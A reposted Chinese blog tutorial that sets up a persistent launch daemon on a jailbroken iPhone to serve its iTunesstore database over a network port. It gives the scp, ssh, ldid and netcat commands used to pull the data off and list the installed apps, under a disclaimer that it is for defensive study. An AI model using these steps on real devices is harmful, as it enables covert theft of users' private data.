美文网首页
0x02 后台 daemon 非法窃取用户 iTunesstor

0x02 后台 daemon 非法窃取用户 iTunesstor

作者: richar_ | 来源:发表于2017-09-14 11:28 被阅读0次

    注:原文---念茜的博客

    本人郑重声明:并不鼓励窃取用户隐私等行为,一切hack学习都只是为了研究如何防御。OK,进入正题。

    开机自启动

    0x1 Hack必备的命令与工具中,介绍了如何编译自己的C程序并手动启动。今天介绍如何使程序变为开机自启动。

    1.首先打开Xcode创建一个plist属性文件,如下图所示:

    其中要注意一下通信服务名,我定为55。用编辑器打开,即为:

    最后,将 plist 文件 scp 至

    root@192.168.1.114:/System/Library/LaunchDaemons/下 。

    编写读取 iTunesstore 数据库程序

    读取 itunesstored2.sqlitedb 信息,并输出到 stdout 中,便于我们读取。

    编译、拷贝、签名

    1.编译方法上篇文章已经介绍清楚,这里不再重复,直接 ¥%¥#%¥……%# 生成运行在 ARM 的 ncdemo

    2.将 ncdemo scp 到设备中,并登录

    $ scp ncdemo root@192.168.1.114:ncdemo

    $ ssh root@192.168.1.114

    3.签名

    #ldid -S ncdemo

    #mv ncdemo /usr/bin

    抓取 iTunesstore 数据信息

    这时,我们只需要利用 netcat,指定之前定义的服务名称,轻松在本地抓取设备 iTunesstore 信息:

    $ nc 192.168.1.114 55 > itunesstored2.sqlitedb

    分析 iTunesstore 数据信息

    好吧,这里就介绍个最简单的应用,利用string命令查看:

    $ strings itunesstored2.sqlitedb

    于是乎,我们就清晰的得到了 iPhone/iPad 设备上都安装了哪些 app :

    当然,除了这些,你想干什么都可以……夜深了,先写到这里吧……

    相关文章

      网友评论

          本文标题:0x02 后台 daemon 非法窃取用户 iTunesstor

          本文链接:https://www.haomeiwen.com/subject/aqarsxtx.html